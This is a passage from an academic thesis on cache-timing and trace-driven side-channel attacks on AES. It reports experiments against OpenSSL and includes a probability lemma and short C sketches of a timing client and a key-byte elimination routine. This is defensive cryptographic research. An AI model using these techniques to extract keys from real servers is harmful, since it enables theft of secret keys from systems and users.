sample subsets of size ≈ N/2^(8−`). In contrast, each of the 16 runs of the improved
attack variant only requires the computation of the average execution times of
256 subsets of size ≈ NI/256 (with NI denoting the sample size for an individual
guessing problem) and sorting two lists with 256 elements (plaintexts and key
byte candidates). Even more importantly, 16·NI will turn out to be clearly smaller
than N (cf. Sect. 5.4).
The only drawback of the improved variant is that it is a chosen-input
attack, i.e., it requires an active role of the adversary. In contrast, the basic
variant explained in the previous section is principally a known-plaintext attack,
which means an adversary does not have to actively interfere with the execution
of the encryption process, i.e., the attack can be carried out by monitoring the
traffic of the encryption process. However, this is only true for the (less important)
so-called innerprocess attacks (cf. Section 5.4 for details). For ‘real’ attacks
(interprocess and remote attacks) the basic variant is performed as a chosen-input attack, too, since the attacker needs to choose the plaintext to be encrypted
as the concatenation of several identical 128 bit strings in order to increase the
signal-to-noise ratio.
5.4. Experimental Details and Results
We performed two types of experimental attacks that we call innerprocess
and interprocess attacks to test the validity of our attack variants. In the innerprocess attack we generated random single-block messages and measured their
encryption times under the same key. The encryption was just a function that
is called by the application to process a message. The execution time of the
cryptosystem was obtained by calculating the difference of the time just before
the function call and immediately after the function return. Therefore, there was
minimum noise and the execution time was measured almost exactly.
For the second part of the experiments, i.e., the interprocess attack, we implemented a simple TCP server and a client program that exchange ASCII strings
during the attack. The server reads the queries sent by the client, and sends a
response after encrypting each of them. The client measures the time between
sending a message and receiving the reply. These measurements were used to
guess the secret key. The server and client applications run on the same machine
in this attack. There was no transmission delay in the time measurements but
network stack delays were present.
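For illustration, a stripped-down version of the client's measurement step might look as follows. This is a hypothetical sketch rather than our exact tool: the port number and query format are placeholders, a query of L = 1024 identical 16-byte blocks is sent, the server is assumed to echo back an equally long encrypted reply, the round-trip time is taken with the cycle counter, and error handling is reduced to the bare minimum.

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <arpa/inet.h>
    #include <sys/socket.h>
    #include <x86intrin.h>

    #define PORT      5000               /* hypothetical server port    */
    #define QUERY_LEN (1024 * 16)        /* L = 1024 blocks of 16 bytes */

    int main(void)
    {
        int fd = socket(AF_INET, SOCK_STREAM, 0);
        struct sockaddr_in addr;
        memset(&addr, 0, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(PORT);
        inet_pton(AF_INET, "127.0.0.1", &addr.sin_addr);
        if (fd < 0 || connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
            return 1;

        unsigned char query[QUERY_LEN], reply[QUERY_LEN];
        memset(query, 0xab, sizeof(query));   /* one block value repeated L times */

        uint64_t t0 = __rdtsc();
        write(fd, query, sizeof(query));
        ssize_t got = 0;
        while (got < (ssize_t)sizeof(reply)) {    /* read back the encrypted reply */
            ssize_t r = read(fd, reply + got, sizeof(reply) - got);
            if (r <= 0)
                break;
            got += r;
        }
        uint64_t cycles = __rdtsc() - t0;
        printf("round trip: %llu cycles\n", (unsigned long long)cycles);

        close(fd);
        return 0;
    }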
Brumley and Boneh pointed out that a real remote attack over a network
is in principle able to break a remote cipher when the interprocess version of the
same attack works successfully. Furthermore, their experiments also show that
their actual remote attack requires roughly the same number of samples used in the
interprocess version [21]. Therefore, we only performed interprocess experiments.
Applying an interprocess attack successfully is sufficient evidence to claim that the
actual remote version would also work with (most likely) a larger sample size.
We performed our attack against OpenSSL version 0.9.7e. All of the experiments were run on a 3.06 GHz HT-enabled Xeon machine with a Linux
operating system. The source code was compiled using the gcc compiler version
3.2.3 with default options. We used random plaintexts generated by the rand() and
srand() functions available in the standard C library. The current time is fed into
the srand() function, serving as the seed for the pseudorandom number generator. We
measured time in terms of clock cycles using the cycle counter.
For the experiments of innerprocess attack, we loaded 8 KB garbage data
into the L1 cache before each encryption to remove all AES data from the first
level cache. We did not employ this type of cache cleaning during the experiments
of the interprocess attack. Instead, we wrote a simple dummy program that randomly
accesses an 8 KB array and ran this program simultaneously with the server in
order to imitate the effect of a workload on the computer.
We used two parameters in our experiments.
1. Sample Size (N ): This is the number of different (plaintext, execution time)
pairs collected during the first phase of the attacks. We have to use a large
enough sample of queries to obtain accurate statistical characteristics of the
system. However, a very large sample size causes an unnecessary increase in
the cost of the attack.
2. Message Length (L): This is the number of message blocks in each query.
We concatenated L copies of a single random block to
form the actual query. L was 1 during the innerprocess attack, i.e., each
query was a single block, whereas it was 1024 in the interprocess attack.
This parameter is used to increase the signal-to-noise ratio in the case of
having network delays in the measurements.
We performed our attacks on the variant of AES that has 128-bit key and
block sizes. The cache line size of the L1 cache is 64 bytes, which makes ` = 4
bits. The cipher was run in ECB mode. In our experiments, we performed all
second round guessing problems for the basic attack with only 2^12 different key
hypotheses, one of them being the correct key combination. Our intention was
to demonstrate the general principle while saving many encryptions. In this way,
we reduced the complexity of the ‘bottleneck’ exhaustive search by even more than a
factor of 2^20 since fewer samples are sufficient for the reduced search space.
For the innerprocess attack, collecting 2^18 samples was enough to find the
correct value of the key. Since we only considered 2^12 different key hypotheses in
the second round guessing problems, the required sample size would be more than 2^18
for a real-scale innerprocess attack. In fact, statistical calculations suggest that
4·2^18 samples should be sufficient for 2^32 key hypotheses although in a strict sense
(5.13) only guarantees an error probability of at most 2ε/(1 − c) − ε²/(1 − c)² >
2ε − ε² (cf. Example 1 in Section 5.5). (The right-hand side denotes the error
probability for the reduced search space while c is unknown.) However, since (5.11) is a
(pessimistic) lower bound, we may expect that the true error probability is indeed
significantly smaller, possibly after increasing the sample size somewhat.
The key experiment is the interprocess attack, which shows the vulnerability of remote servers against such cache attacks. In our experiments, we collected
50 million random but known samples and applied our attack on this sample set.
This sample size was clearly sufficient to reveal the correct key value among 2^12
different key hypotheses. Again, the same heuristic arguments indicate the sufficiency of 200 million samples in a real-scale attack. We also estimated the number
of required samples in a remote attack over a local network. Rough statistical considerations indicate that increasing the sample size of the interprocess attack by
a factor of less than 6 should be sufficient to successfully apply the attack on a
remote server.
We tested our improved variant on the same platform with the same settings. The only difference was the set of the plaintexts sent to the server. We only
performed the interprocess attack with this new decision strategy. Our experimental
results indicate a clear improvement over the basic attack. We could recover a full
128-bit AES key by encrypting slightly more than 6.5 million samples on average
for each of the 16 guessing problems and a total of 106 million queries, each containing L = 1024 message blocks. Recall the further advantage of the improved
variant, namely the much lower analysis costs.
We want to mention that all of these results correspond to the minimum
number of samples from which we got the correct decision from our decision strategy. In a real-life attack an adversary clearly has to collect more samples to be
confident in her decisions. More sophisticated stochastic models
that are tailored to specific cache strategies will certainly improve the efficiency
of our attack.
Our client-server model does not perfectly fit the behavior of an actual security application. In reality, encrypting/decrypting parties do not send
responses immediately and perform extra operations besides encryption and decryption. However, this fact does not nullify our client-server model. Although
the lower signal-to-noise ratio in actual attacks increases the cost, it does not change
the feasibility of our attacks in principle. We want to mention that timing variations
caused by extra operations decrease the signal-to-noise ratio. If a security application performs the same operations for each processed message, we expect
the “extra timing variations” to be minimal, in which case the decrease in the
signal-to-noise ratio, and thus the increase in the cost of the attack, also remains
small.
5.5. Scaling the Sample Size N
In order to save measurements we performed our practical experiments
on the basic second round attack from Subsect. 5.2.2 with a reduced key space.
Clearly, to maintain the success probability for the full subkey space the sample
size N must be increased to N' since the adversary has to distinguish between
more admissible alternatives. In this section we estimate the ratio r := N'/N.
We interpret the measured average execution times for the particular subkey candidates as realizations of normally (Gaussian) distributed random variables, denoted by Y (related to the correct subkey) and X1, . . . , Xm−1 (related to
the wrong subkey candidates) for the reduced subkey space, resp. X1, . . . , Xm'−1
when all possible subkeys are admissible. We may assume Y ∼ N(µA, σA²) while
Xj ∼ N(µB, σB²) for j ≤ m − 1, resp. for j ≤ m' − 1, with unknown expectations µA and µB and variances σA² and σB². Clearly, µA ≠ µB since our attack
exploits differences of the average execution times. Since it only exploits the relation between two table lookups, σA² ≈ σB² seems to be reasonable, the variances
clearly depending on N. W.l.o.g. we may assume µA > µB. We point out that
E(X1 + ... + Xm−1 + Y)/m ≈ µB unless m is very small.
Pr(correct guess) ≈ Pr(|Y − µB| > max{|X1 − µB|, . . . , |Xm−1 − µB|})
= Pr(min{X1, ..., Xm−1} > µB − (Y − µB), max{X1, ..., Xm−1} < Y)
≈ Pr(max{X1, ..., Xm−1} < Y)²   (5.8)
Unless m is very small the ≈ sign should essentially be “=”. If the random
variables Y, X1, . . . , Xm−1 were independent we would have
Pr(max{X1, ..., Xm−1} ≤ t) = ∏_{j=1}^{m−1} Pr(Xj ≤ t) = Φ((t − µB)/σB)^(m−1)   (5.9)
where Φ denotes the cumulative distribution function of the standard normal
distribution. From (5.9) one immediately deduces
Pr(max{X1, ..., Xm−1} < Y) ≈ ∫_{−∞}^{∞} Φ((z − µB)/σB)^(m−1) fA(z) dz   (5.10)
where Y has density fA. In the context of Subsect. 5.2.2 the random variables
Y, X1, . . . , Xm−1 are in fact dependent. However, for different subkey candidates ki
and kj the size of the intersection of the respective subsets is small compared
to the size of these subsets themselves. Hence we may hope that the influence
of the correlation between Xi and Xj is negligible. Under this assumption (5.10)
provides a concrete formula for the probability of a correct guess. However, this
formula cannot be evaluated in practice since µA, µB and σA² ≈ σB² are unknown.
Instead, we prove a useful lemma.
Lemma 1. (i) Let f denote a probability density, while 0 ≤ g, h ≤ 1 are integrable
functions and Mc := {y : g(y) ≤ c}. Assume further that h ≥ g on R \ Mc. Then
∫ h(z)f(z) dz ≥ 1 − ε/(1 − c)   if   ∫ g(z)f(z) dz = 1 − ε.   (5.11)
(ii) Let s, u, b > 1. Then there exists a unique y0 > 0 with Φ(y0·s)^(ub) = Φ(y0)^b. In
particular, Φ(y·s)^(ub) > Φ(y)^b iff y > y0.
Proof. Assertion (i) follows immediately from
(1 − c) ∫_{Mc} f(z) dz ≤ ∫_{Mc} (1 − g(z))f(z) dz ≤ ∫ (1 − g(z))f(z) dz = ε
and hence
∫ h(z)f(z) dz ≥ 0 + ∫_{R\Mc} g(z)f(z) dz = (1 − ε) − ∫_{Mc} g(z)f(z) dz
≥ (1 − ε) − c ∫_{Mc} f(z) dz ≥ 1 − ε − cε/(1 − c) = 1 − ε/(1 − c).
Since Φ(ys)^(ub)/Φ(y)^b = (Φ(ys)^u/Φ(y))^b we may assume b = 1 in the remainder w.l.o.g. Clearly, Φ(ys)^u < Φ(y) for y < 0. Hence we concentrate on the
case y ≥ 0. In particular, log(1 − x) = −x + O(x²) implies
ψ(y) := log(Φ(ys)^u/Φ(y)) = u·log(Φ(ys)) − log(Φ(y))
= u·log(1 − (1 − Φ(ys))) − log(1 − (1 − Φ(y)))
= −u(1 − Φ(ys)) + (1 − Φ(y)) + O((1 − Φ(y))²)
≥ (1/√(2π))·((1/y − 1/y³)·e^(−y²/2) − (u/(ys))·e^(−y²s²/2)) + O(e^(−y²))
> 0 for sufficiently large y,   and   lim_{y→∞} ψ(y) = 0.   (5.12)
We note that the last assertion follows immediately from the definition of ψ while
the ’≥’ sign is a consequence of a well-known inequality for the tail of 1 − Φ (see,
e.g., [36], Chap. VII, 175 (1.8)). Since ψ is continuous and ψ(0) = log(0.5^(u−1)) < 0
there exists a minimal y0 > 0 with ψ(y0) = 0. For any y1 ∈ {y ≥ 0 | ψ'(y) = 0} the
second derivative simplifies to ψ''(y1) = t(y1)Φ'(y1)/Φ(y1) with t(x) := (1 − s²)x +
(1 − 1/u)Φ'(x)/Φ(x). (Note that Φ''(ys) = −ysΦ'(ys) and Φ''(y) = −yΦ'(y).)
Assume that ψ(y0') = 0 for some y0' > y0. As ψ(0) < 0 and ψ(y0) = ψ(y0') = 0
the function ψ attains a local maximum in some ym ∈ [0, y0'). Since t : [0, ∞) → R
is strictly monotonically decreasing, ψ cannot attain a local minimum in (ym, ∞)
(with ψ(·) ≤ 0 = ψ(y0')) which contradicts (5.12). This proves the uniqueness of
y0 and completes the proof of (ii).
Our goal is to apply Lemma 1 to the right-hand side of (5.10). We set
u := (m'−1)/(m−1), b := 1 and s := √r with r := N'/N. Further, f(z) := fA(z),
g(z) := (Φ((z − µB)/σB))^(m−1) and h(z) := (Φ(√r(z − µB)/σB))^(u(m−1)). By (ii) we
have c = Φ((z0 − µB)/σB)^(m−1) and Mc = (−∞, z0] with g(z0) = h(z0). Lemma 1
and (5.8) imply
Pr(correct guess for (m, N)) = (1 − ε)² ⇒ Pr(correct guess for (m', N' = rN)) ≥ [1 − ε/(1 − c)]²   (5.13)
providing a lower probability bound for a correct guess in the full key space attack.
Note that µA, µB, σA² ≈ σB², N, r determine ε, c and z0, which are yet unknown
in real attacks since µA and µB are unknown. Example 1 gives an idea of the
magnitude of r.
Example 1. Let m = 2^12, m' = 2^32, and y0 := (z0 − µB)/σB = Φ^(−1)(c^(1/(m−1))). If
c = 0.5 (resp., if c = 100/101) the number r = N'/N = 3.09 (resp., r = 3.85)
gives Φ(y0·√r)^(u(m−1)) = Φ(y0)^(m−1) = 0.5 (resp., = 100/101).
5.6. Conclusion
We have presented a cache-based timing attack on AES software implementations. Our experiments indicate that cache attacks can be used to extract
secret keys of remote systems if the system under attack runs on a server with
a multitasking or multithreading system and a large enough workload. Although
a large number of measurements are required to successfully perform a remote
cache attack, it is feasible in principle. In this regard, we would like to point out
the feasibility of such cache attacks to the public, and recommend implementing
appropriate countermeasures. Several countermeasures [75, 14, 73, 76, 77, 19]
have been proposed to prevent possible vulnerabilities and develop more secure
systems.
6. TRACE-DRIVEN CACHE ATTACKS ON AES
There are various cache based side-channel attacks in the literature, which
are discussed in detail in Chapter 4. Trace-driven attacks are one of the three
types of cache based attacks that have been distinguished so far, c.f. Section 4.1.
We present a trace-driven cache based attack on AES in this chapter. There are
already two trace-driven attacks on AES in the literature [15, 62]. However, our
attacks require a significantly smaller number of measurements (e.g. only 5 measurements in some cases) and are much more efficient than the previous attacks. We
show that trace-driven attacks have indeed much more power than what is stated
in the previous studies.
Furthermore, we present a robust computational model for trace-driven
attacks that allows one to evaluate the cost of such attacks on a given implementation and platform. Although we only apply our model to a single attack on
AES in this document, it can also be used for other symmetric ciphers like DES.
The main contribution of our model to the field is that it can be used to quantitatively analyze the cost of trace-driven attacks on different implementations of a
cipher. Therefore, we can analyze the effectiveness of various mitigations that can
be used against such attacks. Thus, a designer can use our model to determine
which mitigations he needs to implement against trace-driven attacks to achieve
a predetermined security level.
6.1. Overview of Trace-Driven Cache Attacks
In trace-driven attacks, the adversary is assumed to be able to capture the profile of the cache
activity during an encryption. This profile includes the
outcomes of every memory access the cipher issues in terms of cache hits and
misses. Therefore, the adversary has the ability to observe if a particular access
to a lookup table yields a hit and can infer information about the lookup indices,
which are key dependent. This ability gives an adversary the opportunity to make
inferences about the secret key.
Trace-driven attacks on AES were first presented in [62, 15]. Bertoni et al.
implemented a cache based power attack that exploits external collisions between
different processes [15]. Their attack requires 256 power traces to reveal the secret AES key. Lauradoux’s power attack exploits the internal collisions inside the
cipher but only considers the first round AES accesses and can reduce the exhaustive search space of a 128-bit AES key to 80 bits. These attacks are described in
more detail in Sections 4.2.7 and 4.2.8.
We describe much more efficient trace-driven attacks on AES in this chapter. Our two-round attack is a known-plaintext attack and exploits the collisions
among the first two rounds of AES. A more efficient version, which we call the
last round attack, considers last round accesses and is a known-ciphertext attack.
In trace-driven cache attacks, the adversary obtains the traces of cache hits
and misses for a sample of encryptions and recovers the secret key of a cryptosystem using this data. We define a trace as a sequence of cache hits and misses. For
example,
MHHM, HMHM, MMHM, HHMH, MMMM, HHHH
are examples of traces of length 4. Here H and M represent a cache hit and
a cache miss, respectively. The first access in the first example is a miss, the second one is a
hit, and so on. If an adversary captures such traces, he can determine whether a
particular access during an encryption is a hit or a miss.
The trace of an encryption can be captured by the use of power consumption measurements as done in [15, 62]. In this document, we do not get into
the details of how to capture cache traces. We analyze trace-driven attacks on
AES under the assumption that the adversary can capture the traces of AES
encryption. This assumption corresponds to clean measurements in a noiseless
environment. In reality, an adversary may have noise in the measurements in
some circumstances, in which case the cost of the attack may increase depending
on the amplitude of the noise. However, an analysis under the above assumption
gives us a more clear understanding of the attack cost. Assumption of a noiseless
environment also enables us to make more reliable comparison of different attacks.
In a side-channel attack, there are essentially two different phases:
• Online Phase: consists of the collection of side-channel information of the
target cipher. This phase is also known as the sampling phase of the attack.
The adversary encrypts or decrypts different input values and measures the
side-channel information, e.g., power consumption or execution time of the
device.
• Offline Phase: is also known as the analysis phase. In this phase, the adversary processes the data collected in the online phase and makes predictions
and verifications regarding the secret value of the cipher.
An adversary usually performs the former phase completely before the latter one.
However, in some cases, especially in adaptive chosen-text attacks (e.g. [21, 6]),
these two phases may overlap and may be performed simultaneously.
We use two different metrics to evaluate the cost of our attacks. The first
metric is the expected number of traces that we need to capture to narrow the
search space of the AES key down to a certain degree. The second metric is the
average number of operations we need to perform to analyze the captured traces
and eliminate the wrong key assumptions. These metrics basically represent the
cost of the online and offline phases of our attacks. As the reader can clearly see
in this chapter, there is a trade-off between the costs of these two phases.
6.2. Trace-Driven Cache Attacks on the AES
In this chapter, we present trace-driven attacks on the most widely used
implementation of AES, and estimate their costs. We assume that the cache does
not contain any AES data prior to each encryption, because the captured traces
cannot be accurate otherwise. Therefore, the adversary is assumed to clean the
cache (e.g., by loading some garbage data as done in [15, 100, 101, 73, 80]) before
the encryption process starts.
Another assumption we make is that the data in AES lookup tables cannot
be evicted from the cache during the encryption once they are loaded into the
cache. This assumption means that each lookup table can only be stored in
a different non-overlapping location of the cache, and that there is no context switch
during an encryption, nor any other process that runs simultaneously with the cipher
and evicts the AES data. These assumptions hold if the cache is large enough,
which is the case for most of the current processors. An adversary can also discard
a trace if a context-switch occurs during the measurement.
We also assume that each measurement is composed of the cache trace of
a single message block encryption. In this document, we only consider AES with
128-bit key and block sizes. Our attacks can easily be adapted to longer key and
block sizes; however we omit these cases for the sake of simplicity.
The implementation we analyze is described in [31] and it is suitable for
32-bit architectures (c.f. Section 2.2.1). It employs 4 different lookup tables in
the first 9 rounds and a different one in the last round. In this implementation,
all of the component functions, except AddRoundKey, are combined into four
different tables and the rounds turn out to be composed of table lookups and bitwise
exclusive-or operations.
In each round, except the last one, it makes 4 references to each of the first
4 tables. The S-box lookups in the final round are implemented as table lookups
to another 1 KB table, called T4, with 256 32-bit elements. There are
16 accesses to T4 in that round. The indices of these accesses are Si^10, where Si^t
is byte i of the intermediate state value that becomes the input of round t and
i ∈ {0, .., 15}. Let C be the ciphertext, i.e. the output of the last round, and
represented as an array of 16 bytes, C = (c0 , c1 , ..., c15 ). Individual bytes of C
are computed as:
ci = Sbox[Sw^10] ⊕ RKi^10,
where RKi^10 is the ith byte of the last round key and Sbox[Sw^10] is the S-box output
for the input Sw^10 for a known w ∈ {0, 1, ..., 15}. The S-box in AES implements a
permutation, and therefore its inverse, i.e. Sbox^(−1), exists.
6.2.1. Overview of an Ideal Two-Round Attack
The access indices in the first round are in the form Pi ⊕ Ki , where Pi
and Ki are the ith bytes of the plaintext and the cipherkey respectively and i ∈
{0, 1, ..., 15}. The indices of the first 4 references to the first table, T0, are:
P0 ⊕ K0 , P4 ⊕ K4 , P8 ⊕ K8 , P12 ⊕ K12 .
The outcome of the second access to T0, i.e. the one with the index P4 ⊕ K4 , gives
information about K0 and K4. For example, if the second access results in a cache
hit, we can directly conclude that the index P4 ⊕ K4 has to be equal to the index
of the first access, i.e., P0 ⊕ K0. If it is a cache miss, then the inequality of these
values becomes true. We can use this fact to find the correct key byte difference
K0 ⊕ K4:
P0 ⊕ K0 = P4 ⊕ K4  ⇒  K0 ⊕ K4 = P0 ⊕ P4
P0 ⊕ K0 ≠ P4 ⊕ K4  ⇒  K0 ⊕ K4 ≠ P0 ⊕ P4
In other words, if we capture a cache trace during the first round of AES
and the second access to T0 results in a cache hit, then we can directly conclude
that K0 ⊕ K4 = P0 ⊕ P4 . Recall that the plaintext is assumed to be known to
an attacker and the cache is clean prior to the first table lookup so that the first
access to a table always results in a cache miss.
On the other hand, if we see a miss, then K0 ⊕ K4 cannot be equal to
P0 ⊕ P4 and we can eliminate this wrong value. If we collect a sample of traces,
we can find the correct value of K0 ⊕ K4 by either eliminating all possible wrong
values or directly finding the correct value when we realize a cache hit in the
second access in any of the sampled traces.
We can also find the other key byte differences Ki ⊕ Kj, where i,j ∈
{0,4,8,12}, using the same idea. We can further reduce the search space by considering the accesses to the other three tables. In general, we can obtain Ki ⊕ K4*j+i,
where i,j ∈ {0,1,2,3}, which makes it enough to search only 32 bits to find the
entire 128-bit key.
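The following sketch illustrates this elimination for the single difference K0 ⊕ K4 in the ideal setting described above, where every table element maps to its own cache line. It is our own illustration; each captured trace is reduced to the plaintext bytes P0 and P4 and a flag saying whether the second access to T0 was a hit.

    #include <stdint.h>
    #include <string.h>

    static uint8_t candidate[256];      /* candidate[d] != 0: d may still be K0 ^ K4 */

    void init_candidates(void) { memset(candidate, 1, sizeof(candidate)); }

    /* returns the recovered difference once it is unique, and -1 otherwise */
    int process_trace(uint8_t p0, uint8_t p4, int second_access_was_hit)
    {
        uint8_t d = (uint8_t)(p0 ^ p4);

        if (second_access_was_hit) {
            /* a hit fixes the difference immediately: K0 ^ K4 = P0 ^ P4 */
            memset(candidate, 0, sizeof(candidate));
            candidate[d] = 1;
            return d;
        }

        candidate[d] = 0;               /* a miss rules out this difference */

        int last = -1, count = 0;
        for (int i = 0; i < 256; i++)
            if (candidate[i]) { last = i; count++; }
        return (count == 1) ? last : -1;
    }

In the realistic setting of Subsection 6.2.3, the same loop would operate on the most significant (8 − `) bits of the indices only.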
A final search space of 32 bits is only a theoretical lower bound in the first
round attack due to the complications explained in Subsection 6.2.3. We also have
to consider second round accesses to really reduce the search space to 32 bits. The
first round attack only reveals some of the bits of Ki ⊕ Kj . However, when we
examine the collisions between the first and second round accesses in the same
way, i.e., in a “two-round attack”, we can reveal the entire AES key.
6.2.2. Overview of an Ideal Last Round Attack
Another way to find the cipherkey is to exploit the collisions between the
last round accesses. The outcomes of the last round accesses to T4 leak information about the values of the last round key bytes, i.e., RKi^10 where i ∈ {0, .., 15}.
The S-box lookups in the final round are implemented as table lookups
to another 1 KB table, called T4, with 256 32-bit elements. Four
repetitions of the same 8-bit Sbox element are concatenated to each other
to form the corresponding 32-bit element of T4. There are 16 accesses to T4
in that round. The indices of these accesses are Sw^10, where Sw^t is byte w of
the intermediate state value that becomes the input of round t and w ∈ {0, .., 15}.
Let C be the ciphertext, i.e. the output of the last round, represented as an
array of 16 bytes, C = (c0, c1, ..., c15). Individual bytes of C are computed as:
ci = Sbox[Ii] ⊕ RKi^10,
where RKi^10 is the ith byte of the last round key, Sbox[Ii] is the S-box output for
the input index Ii, and Ii = Sw^10 for known w, i ∈ {0, 1, ..., 15}.
Ii is equal to Sw^10 for known values of i and w, but the actual mapping
between these variables is not relevant for our purposes. In this document, we present
our attack under the assumption that the AES memory accesses in the last round
are issued by the processor in a given order, i.e., first T4[I0], second T4[I1], etc.
However, the actual order is implementation specific and may differ from our
assumption. Our attack can easily be adapted to any given order without any
performance loss. We also need to mention that the S-box in AES implements a
permutation, and therefore its inverse, i.e. Sbox^(−1), exists.
The outcomes of the last round accesses to T4 leak information about the
values of the last round key bytes, i.e., RKi^10 where i ∈ {0, .., 15}. For example, if
the second access to T4 results in a cache hit, we can conclude that the indices I0
and I1 are equal. If it is a cache miss, then the inequality of these values becomes
true. We can use this fact to find the correct round key bytes RK0^10 and RK1^10 as
follows.
We can write the value of Ii in terms of RKi^10 and ci:
Ii = Sbox^(−1)[ci ⊕ RKi^10].
If I0 and I1 are equal, so are Sbox^(−1)[c0 ⊕ RK0^10] and Sbox^(−1)[c1 ⊕ RK1^10], which
also mandates the equality of c0 ⊕ RK0^10 and c1 ⊕ RK1^10. This equality can also
be written as
c0 ⊕ RK0^10 = c1 ⊕ RK1^10 ⇒ c0 ⊕ c1 = RK0^10 ⊕ RK1^10.
Since the value of C is known to the attacker, RK0^10 ⊕ RK1^10 can directly be
computed from the values of c0 and c1 if the second access to T4 results in a cache
hit. In case of a cache miss, we can replace the = sign in the above equations
with ≠ and we can use the inequalities to eliminate the values that cannot be the
correct value of RK0^10 ⊕ RK1^10.
The value of RK2^10 relative to RK0^10 can also be determined by analyzing
the first three accesses to T4 after the correct value of RK0^10 ⊕ RK1^10 is found.
Similarly, if we extend our focus to the first four accesses, we can find RK3^10. Then
we can find RK4^10 and so on.
In general, we can find all of the round key byte differences RKi^10 ⊕ RKj^10,
where i, j ∈ {0, 1, ..., 15}. The value of any single byte RKi^10 can be searched
exhaustively to determine the entire round key. After revealing the entire round
key, it becomes trivial to compute the actual secret key, because the key expansion
of the AES cipher is a reversible function.
6.2.3. Complications in Reality and Actual Attack Scenarios
In a real environment, even if the index of the second access to a certain
lookup table is different than the index of the first access, a cache hit may still
occur. Any cache miss results in the transfer of an entire cache line, not only
one element, from the main memory. Therefore, if the latter access retrieves an
element that lies in the same cache line as the previously accessed data, a cache
hit will occur.
Let δ be the number of bytes in a cache line and assume that each element
of the table is k bytes long. In this situation, there are δ/k elements in each
line, which means any access to a specific element will map to the same line as
(δ/k − 1) other accesses. If two different accesses to the same array read
the same cache line, the most significant parts of their indices, i.e., all of the bits
except the last ` = log2(δ/k) bits, must be identical. Using this fact, we can find
the difference of the most significant parts of the key bytes using the equation:
⟨P0⟩ ⊕ ⟨P4⟩ = ⟨K0⟩ ⊕ ⟨K4⟩,
where ⟨A⟩ stands for the most significant part of A.
Therefore, we can only reveal ⟨Ki ⊕ K4*j+i⟩, where i,j ∈ {0,1,2,3}, using the
collisions in the first round. Notice that (8 − `) is the size of the most significant
part of a table entry in terms of the number of bits, where ` = log2(δ/k). The first
round attack allows us to reduce the search space by 12 ∗ (8 − `) bits. In theory
` can be as low as zero bits, in which case the search space becomes only 32 bits.
The most common values of δ are 32 and 64 in widely used processors. For δ = 64
the search space is reduced by 48 bits, yielding an 80-bit final search space. This is
the reason why we need to consider the second round indices along with the first
round to achieve full key disclosure.
This complication does affect the last round attack too. We observe a
cache hit in the second access to T4 whenever
⟨S0^10⟩ = ⟨S5^10⟩,
and so
⟨Sbox^(−1)[c0 ⊕ RK0^10]⟩ = ⟨Sbox^(−1)[c1 ⊕ RK1^10]⟩.
However, due to the nonlinearity of the AES S-box, only the correct RK0^10 and
RK1^10 values obey the above equation for every ciphertext sample. Therefore, we
need to find the correct RK0^10 and RK1^10 values instead of their difference. This
increases the search space of this initial guessing problem from 8 bits to 16 bits.
However, once we find these round key bytes, we only need to search through 8
bits to find each of the remaining round key bytes.
6.2.4. Further Details of Our Attacks
In this subsection we explain some details of our attacks that are not
mentioned above. To be more precise, we explain the overall attack strategy and
how to exploit second round accesses.
We call the set of all values that can still be the correct value of a key byte (round
key byte, respectively) the hypotheses of that particular key byte (round key
byte, resp.), or shortly the key byte hypotheses (round key byte hypotheses, resp.).
Incorrect values are called wrong hypotheses. Initially, all 256 values, i.e.,
from 0x00 to 0xff, are considered as hypotheses for a particular key
byte. During the course of the attack, we identify some of these values as
wrong key byte hypotheses; thus the number of remaining hypotheses decreases as
the number of identified wrong hypotheses increases.
In our attacks, we consider each access to a lookup table separately, starting
from the second one. The first access is always a miss because of the cache cleaning
and the assumptions explained above. We want to use the last round attack as
an example to explain the overall attack strategy.
The outcome of the second access to T4 allows us to eliminate wrong key
hypotheses for RK_0 and RK_1. After we find the correct values of these bytes, we
extend our attack to the third access to find RK_2, then to the fourth access to
find RK_3, and so on. Therefore, the attack proceeds in steps, and each
further step considers one more access than the previous step. Each step works
with a different set of remaining key hypotheses, and eliminating as many wrong
key hypotheses as possible in a step before proceeding with the next one decreases
the overall attack cost.
For example, the first step of the last round attack examines the outcomes
of the first two accesses to T4 in each captured trace in the sample and eliminates
all of the possible RK_0 and RK_1 values that are determined to be wrong. The
second step considers the third access to T4 along with the remaining hypotheses of RK_0
and RK_1 and eliminates all of the (RK_0, RK_1, RK_2) triples that cannot generate
the captured traces. The attack continues with the later steps, and only those key
hypotheses that can generate the captured traces remain at the end. If we can
capture a large enough sample, we end up with only the correct key. If we
have fewer traces, then more than one hypothesis remains at the end of
the attack and we need to perform an exhaustive search on this reduced key set.
Eliminating as many wrong key hypotheses as possible in earlier steps reduces the
cost of the later ones and therefore the total cost of the attack. In each step we
eliminate all of the key hypotheses that do not agree with the captured trace.
In this sense, our decision strategy is optimal, because it eliminates the maximum
possible number of hypotheses.
The two-round attack is slightly different from this scheme. There are four
different lookup tables used in the first two rounds of AES. Therefore, a single step
of the two-round attack considers four more accesses than the previous step, i.e.,
the next unexamined access to each of the four tables. For example, the first step
considers the first 8 accesses in the first round. These 8 accesses consist of two
accesses to each of the four tables. The next step considers the first 12 accesses
and so on.
We also want to give more details of the two-round attack, especially the
second round attack, in this subsection. Using the guesses from the first round, a
similar guessing procedure can be derived in the second round in order to obtain
further key bits. We describe a possible attack that uses only accesses to T1, i.e.,
the second table. Recall that the AES implementation we work on uses 5 different
tables, each with 256 entries.
Let ∆_i represent P_i ⊕ K_i. The index of the first access to T1 in the second
round is:

Sbox(∆_4) ⊕ 2 • Sbox(∆_9) ⊕ 3 • Sbox(∆_14) ⊕ Sbox(∆_3) ⊕ Sbox(K_14) ⊕ K_1 ⊕ K_5 .
Here Sbox(x) stands for the result of AES S-box lookup with the input value x
and • is the finite field multiplication used in AES.
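For concreteness, the second-round index expression above can be evaluated as in the following sketch; Sbox[] denotes the AES S-box table (assumed available), and the multiplications by 2 and 3 are the usual AES finite field operations.

    #include <stdint.h>

    extern const uint8_t Sbox[256];     /* AES S-box, assumed provided elsewhere */

    /* multiplication by 2 in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1 */
    static uint8_t xtime(uint8_t x)
    {
        return (uint8_t)((x << 1) ^ ((x & 0x80) ? 0x1b : 0x00));
    }
    static uint8_t mul2(uint8_t x) { return xtime(x); }
    static uint8_t mul3(uint8_t x) { return (uint8_t)(xtime(x) ^ x); }

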